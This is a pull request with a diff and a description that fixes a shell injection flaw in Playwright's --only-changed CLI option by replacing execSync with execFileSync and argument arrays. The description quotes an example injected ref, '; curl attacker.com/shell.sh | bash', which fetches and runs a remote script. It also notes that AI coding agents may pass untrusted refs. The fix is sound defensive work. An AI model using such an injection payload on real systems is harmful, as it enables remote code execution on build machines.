### PR TITLE
fix(cli): prevent shell injection in --only-changed ref argument

### DIFF
--- a/packages/playwright/src/runner/vcs.ts
+++ b/packages/playwright/src/runner/vcs.ts
@@ -20,10 +20,10 @@ import path from 'path';
 import { cc } from '../common';
 
 export async function detectChangedTestFiles(baseCommit: string, configDir: string): Promise<Set<string>> {
-  function gitFileList(command: string) {
+  function gitFileList(args: string[]) {
     try {
-      return childProcess.execSync(
-          `git ${command}`,
+      return childProcess.execFileSync(
+          'git', args,
           { encoding: 'utf-8', stdio: 'pipe', cwd: configDir }
       ).split('\n').filter(Boolean);
     } catch (_error) {
@@ -31,7 +31,7 @@ export async function detectChangedTestFiles(baseCommit: string, configDir: stri
 
       const unknownRevision = error.output.some(line => line?.includes('unknown revision'));
       if (unknownRevision) {
-        const isShallowClone = childProcess.execSync('git rev-parse --is-shallow-repository', { encoding: 'utf-8',  stdio: 'pipe', cwd: configDir }).trim() === 'true';
+        const isShallowClone = childProcess.execFileSync('git', ['rev-parse', '--is-shallow-repository'], { encoding: 'utf-8',  stdio: 'pipe', cwd: configDir }).trim() === 'true';
         if (isShallowClone) {
           throw new Error([
             `The repository is a shallow clone and does not have '${baseCommit}' available locally.`,
@@ -42,17 +42,17 @@ export async function detectChangedTestFiles(baseCommit: string, configDir: stri
 
       throw new Error([
         `Cannot detect changed files for --only-changed mode:`,
-        `git ${command}`,
+        `git ${args.join(' ')}`,
         '',
         ...error.output,
       ].join('\n'));
     }
   }
 
-  const untrackedFiles = gitFileList(`ls-files --others --exclude-standard`).map(file => path.join(configDir, file));
+  const untrackedFiles = gitFileList(['ls-files', '--others', '--exclude-standard']).map(file => path.join(configDir, file));
 
-  const [gitRoot] = gitFileList('rev-parse --show-toplevel');
-  const trackedFilesWithChanges = gitFileList(`diff ${baseCommit} --name-only`).map(file => path.join(gitRoot, file));
+  const [gitRoot] = gitFileList(['rev-parse', '--show-toplevel']);
+  const trackedFilesWithChanges = gitFileList(['diff', baseCommit, '--name-only']).map(file => path.join(gitRoot, file));
 
   return new Set(cc.affectedTestFiles([...untrackedFiles, ...trackedFilesWithChanges]));
 }


### PR DESCRIPTION
## Summary

- Replace `execSync` with `execFileSync` using argument arrays in `vcs.ts` to prevent shell injection via the `--only-changed [ref]` CLI option
- The ref argument was interpolated directly into a shell command string, allowing arbitrary command execution

## Problem

The `--only-changed [ref]` option flows from the CLI into `detectChangedTestFiles()` where it is interpolated into a shell string:

```typescript
childProcess.execSync(`git diff ${baseCommit} --name-only`, ...)
```

A ref value containing shell metacharacters (e.g., `; curl attacker.com/shell.sh | bash`) would execute the injected command.

### Why this matters now

**Playwright's own CI documentation** recommends passing environment variables to `--only-changed` in GitHub Actions workflows ([docs/src/ci.md](https://github.com/microsoft/playwright/blob/main/docs/src/ci.md)):

```yaml
run: npx playwright test --only-changed=origin/$GITHUB_BASE_REF
```

This pattern is actively copied by the community:
- Pre-commit hooks running `npx playwright test --only-changed` on every commit ([example](https://github.com/PramodKumarYadav/playwright-sandbox/blob/main/.husky/pre-commit))
- npm scripts: `"changed": "npx playwright test --only-changed"` ([example](https://github.com/playwrightsolutions/playwright-api-test-demo))
- AI agent skill files documenting `--only-changed=$GITHUB_BASE_REF` for CI sharding ([example](https://github.com/oakoss/agent-skills/blob/main/skills/e2e-testing/references/ci-sharding.md))

While `$GITHUB_BASE_REF` itself is safe (set by GitHub's runner), the pattern normalizes passing dynamic values to `--only-changed`. The natural variations, `$GITHUB_HEAD_REF` (attacker-controlled PR branch name) or refs derived from PR metadata, are exploitable. AI coding agents ([OpenClaw](https://github.com/openclaw/openclaw), Claude Code, Cursor) that automate test workflows may construct refs from untrusted sources without the user inspecting every CLI argument ([openclaw/openclaw#63734](https://github.com/openclaw/openclaw/issues/63734), [openclaw/openclaw#68428](https://github.com/openclaw/openclaw/issues/68428)).

The fix applies `execFileSync` with argument arrays to all git calls in `vcs.ts`, including the shallow clone detection fallback. `execFileSync` bypasses the shell entirely, so metacharacters in the ref have no effect.

## Changes

- `packages/playwright/src/runner/vcs.ts`: Replace all `execSync` calls with `execFileSync` using argument arrays